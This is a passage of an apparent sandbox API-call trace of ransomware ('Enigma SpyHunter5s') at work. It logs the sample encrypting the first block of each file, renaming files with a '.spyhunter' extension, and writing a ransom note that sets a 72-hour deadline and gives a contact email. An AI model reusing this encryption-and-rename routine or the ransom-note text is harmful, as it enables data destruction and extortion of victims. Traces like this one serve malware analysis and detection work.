Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.588] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\HKSCS.txt.spyhunter") returned 108 [0180.588] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\HKSCS.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\hkscs.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\HKSCS.txt.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\hkscs.txt.spyhunter")) returned 1 [0180.589] GetProcessHeap () returned 0x2c0000 [0180.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.589] GetProcessHeap () returned 0x2c0000 [0180.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0180.589] GetProcessHeap () returned 0x2c0000 [0180.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee15b8 | out: hHeap=0x2c0000) returned 1 [0180.589] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce280 | out: pbBuffer=0x25ce280) returned 1 [0180.590] GetProcessHeap () returned 0x2c0000 [0180.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0180.590] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce278*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce278*=0x30) returned 1 [0180.590] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0180.613] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur32.clx") returned 101 [0180.613] StrStrW (lpFirst="tur32.clx", lpSrch=".txt") returned 0x0 [0180.613] GetProcessHeap () returned 0x2c0000 [0180.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0180.613] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.702] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.702] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.702] GetProcessHeap () returned 0x2c0000 [0180.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0180.702] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.702] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce27c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x25ce27c*, lpNumberOfBytesWritten=0x25ce23c*=0x4, lpOverlapped=0x0) returned 1 [0180.778] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce23c*=0x30, lpOverlapped=0x0) returned 1 [0180.778] CloseHandle (hObject=0xb0) returned 1 [0180.778] GetProcessHeap () returned 0x2c0000 [0180.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.778] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur32.clx.spyhunter") returned 111 [0180.778] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur32.clx"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur32.clx.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur32.clx.spyhunter")) returned 1 [0180.779] GetProcessHeap () returned 0x2c0000 [0180.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.779] GetProcessHeap () returned 0x2c0000 [0180.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0180.779] GetProcessHeap () returned 0x2c0000 [0180.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee0f28 | out: hHeap=0x2c0000) returned 1 [0180.779] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce278 | out: pbBuffer=0x25ce278) returned 1 [0180.779] GetProcessHeap () returned 0x2c0000 [0180.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0180.779] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce270*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce270*=0x30) returned 1 [0180.779] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0180.780] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd32.clx") returned 101 [0180.780] StrStrW (lpFirst="swd32.clx", lpSrch=".txt") returned 0x0 [0180.780] GetProcessHeap () returned 0x2c0000 [0180.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0180.780] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce234, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce234*=0x2800, lpOverlapped=0x0) returned 1 [0180.794] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.794] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce234, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce234*=0x2800, lpOverlapped=0x0) returned 1 [0180.794] GetProcessHeap () returned 0x2c0000 [0180.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0180.794] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.794] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce274*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce234, lpOverlapped=0x0 | out: lpBuffer=0x25ce274*, lpNumberOfBytesWritten=0x25ce234*=0x4, lpOverlapped=0x0) returned 1 [0180.795] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce234, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce234*=0x30, lpOverlapped=0x0) returned 1 [0180.795] CloseHandle (hObject=0xb0) returned 1 [0180.795] GetProcessHeap () returned 0x2c0000 [0180.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.795] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd32.clx.spyhunter") returned 111 [0180.795] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd32.clx"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd32.clx.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd32.clx.spyhunter")) returned 1 [0180.796] GetProcessHeap () returned 0x2c0000 [0180.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.796] GetProcessHeap () returned 0x2c0000 [0180.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0180.796] GetProcessHeap () returned 0x2c0000 [0180.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee0898 | out: hHeap=0x2c0000) returned 1 [0180.796] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce278 | out: pbBuffer=0x25ce278) returned 1 [0180.796] GetProcessHeap () returned 0x2c0000 [0180.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0180.796] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce270*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce270*=0x30) returned 1 [0180.797] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0180.797] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd.hyp") returned 99 [0180.797] StrStrW (lpFirst="swd.hyp", lpSrch=".txt") returned 0x0 [0180.797] GetProcessHeap () returned 0x2c0000 [0180.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0180.797] ReadFile (hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce234, lpOverlapped=0x0) Thread: id = 8 os_tid = 0xac8 [0078.045] Sleep (dwMilliseconds=0x3e8) [0081.587] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ff10 | out: pbBuffer=0x270ff10) returned 1 [0081.873] GetProcessHeap () returned 0x2c0000 [0081.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0081.873] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x270ff08*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x270ff08*=0x30) returned 1 [0081.873] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0081.873] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 79 [0081.873] StrStrW (lpFirst="Proofing.msi", lpSrch=".txt") returned 0x0 [0081.874] GetProcessHeap () returned 0x2c0000 [0081.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x32ee50 [0081.874] ReadFile (in: hFile=0xcc, lpBuffer=0x32ee50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fecc, lpOverlapped=0x0 | out: lpBuffer=0x32ee50*, lpNumberOfBytesRead=0x270fecc*=0x2800, lpOverlapped=0x0) returned 1 [0082.011] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.011] WriteFile (in: hFile=0xcc, lpBuffer=0x32ee50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fecc, lpOverlapped=0x0 | out: lpBuffer=0x32ee50*, lpNumberOfBytesWritten=0x270fecc*=0x2800, lpOverlapped=0x0) returned 1 [0082.011] GetProcessHeap () returned 0x2c0000 [0082.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ee50 | out: hHeap=0x2c0000) returned 1 [0082.012] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.016] WriteFile (in: hFile=0xcc, lpBuffer=0x270ff0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fecc, lpOverlapped=0x0 | out: lpBuffer=0x270ff0c*, lpNumberOfBytesWritten=0x270fecc*=0x4, lpOverlapped=0x0) returned 1 [0082.603] WriteFile (in: hFile=0xcc, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fecc, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x270fecc*=0x30, lpOverlapped=0x0) returned 1 [0082.603] CloseHandle (hObject=0xcc) returned 1 [0082.961] GetProcessHeap () returned 0x2c0000 [0082.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0082.961] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.spyhunter") returned 89 [0082.961] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi.spyhunter")) returned 1 [0082.962] GetProcessHeap () returned 0x2c0000 [0082.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0082.962] GetProcessHeap () returned 0x2c0000 [0082.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0082.962] GetProcessHeap () returned 0x2c0000 [0082.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320e30 | out: hHeap=0x2c0000) returned 1 [0082.963] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0082.964] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0082.964] WriteFile (in: hFile=0xcc, lpBuffer=0x270fe3f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ff68, lpOverlapped=0x0 | out: lpBuffer=0x270fe3f*, lpNumberOfBytesWritten=0x270ff68*=0x127, lpOverlapped=0x0) returned 1 [0082.965] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0082.965] WriteFile (in: hFile=0xcc, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ff68, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ff68*=0x2ac, lpOverlapped=0x0) returned 1 [0082.965] CloseHandle (hObject=0xcc) returned 1 [0082.965] GetProcessHeap () returned 0x2c0000 [0082.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3280a8 | out: hHeap=0x2c0000) returned 1 [0082.965] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ff08 | out: pbBuffer=0x270ff08) returned 1 [0082.965] GetProcessHeap () returned 0x2c0000 [0082.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0082.965] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x270ff00*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x270ff00*=0x30) returned 1 [0082.965] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0083.487] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0083.487] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0083.487] GetProcessHeap () returned 0x2c0000 [0083.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x32bdc0 [0083.488] ReadFile (in: hFile=0xcc, lpBuffer=0x32bdc0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fec4, lpOverlapped=0x0 | out: lpBuffer=0x32bdc0*, lpNumberOfBytesRead=0x270fec4*=0x5ac, lpOverlapped=0x0) returned 1 [0083.541] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xfffffa54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.541] WriteFile (in: hFile=0xcc, lpBuffer=0x32bdc0*, nNumberOfBytesToWrite=0x5ac, lpNumberOfBytesWritten=0x270fec4, lpOverlapped=0x0 | out: lpBuffer=0x32bdc0*, lpNumberOfBytesWritten=0x270fec4*=0x5ac, lpOverlapped=0x0) returned 1 [0083.541] GetProcessHeap () returned 0x2c0000 [0083.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32bdc0 | out: hHeap=0x2c0000) returned 1 [0083.541] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.541] WriteFile (in: hFile=0xcc, lpBuffer=0x270ff04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fec4, lpOverlapped=0x0 | out: lpBuffer=0x270ff04*, lpNumberOfBytesWritten=0x270fec4*=0x4, lpOverlapped=0x0) returned 1 [0083.541] WriteFile (in: hFile=0xcc, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fec4, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x270fec4*=0x30, lpOverlapped=0x0) returned 1 [0083.541] CloseHandle (hObject=0xcc) returned 1 [0083.542] GetProcessHeap () returned 0x2c0000 [0083.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x34f030 [0083.542] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.spyhunter") returned 86 [0083.543] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.spyhunter")) returned 1 [0083.543] GetProcessHeap () returned 0x2c0000 [0083.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f030 | out: hHeap=0x2c0000) returned 1 [0083.543] GetProcessHeap () returned 0x2c0000 [0083.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0083.543] GetProcessHeap () returned 0x2c0000 [0083.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326518 | out: hHeap=0x2c0000) returned 1 [0083.543] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ff00 | out: pbBuffer=0x270ff00) returned 1 [0083.543] GetProcessHeap () returned 0x2c0000 [0083.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0083.543] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x270fef8*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x270fef8*=0x30) returned 1 [0083.543] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.544] GetProcessHeap () returned 0x2c0000 [0083.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0083.544] GetProcessHeap () returned 0x2c0000 [0083.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x323990 | out: hHeap=0x2c0000) returned 1 [0083.544] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ff00 | out: pbBuffer=0x270ff00) returned 1 [0083.544] GetProcessHeap () returned 0x2c0000 [0083.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0083.544] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x270fef8*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x270fef8*=0x30) returned 1 [0083.544] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.544] GetProcessHeap () returned 0x2c0000 [0083.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0083.544] GetProcessHeap () returned 0x2c0000 [0083.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3238b8 | out: hHeap=0x2c0000) returned 1 [0083.544] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fef8 | out: pbBuffer=0x270fef8) returned 1 [0083.544] GetProcessHeap () returned 0x2c0000 [0083.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0083.544] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x270fef0*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x270fef0*=0x30) returned 1 [0083.544] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0083.544] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 80 [0083.545] StrStrW (lpFirst="GrooveMUI.xml", lpSrch=".txt") returned 0x0 [0083.545] GetProcessHeap () returned 0x2c0000 [0083.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x32bdc0 [0083.545] ReadFile (in: hFile=0xcc, lpBuffer=0x32bdc0, nNumberOfBytesToRead=0x2800, 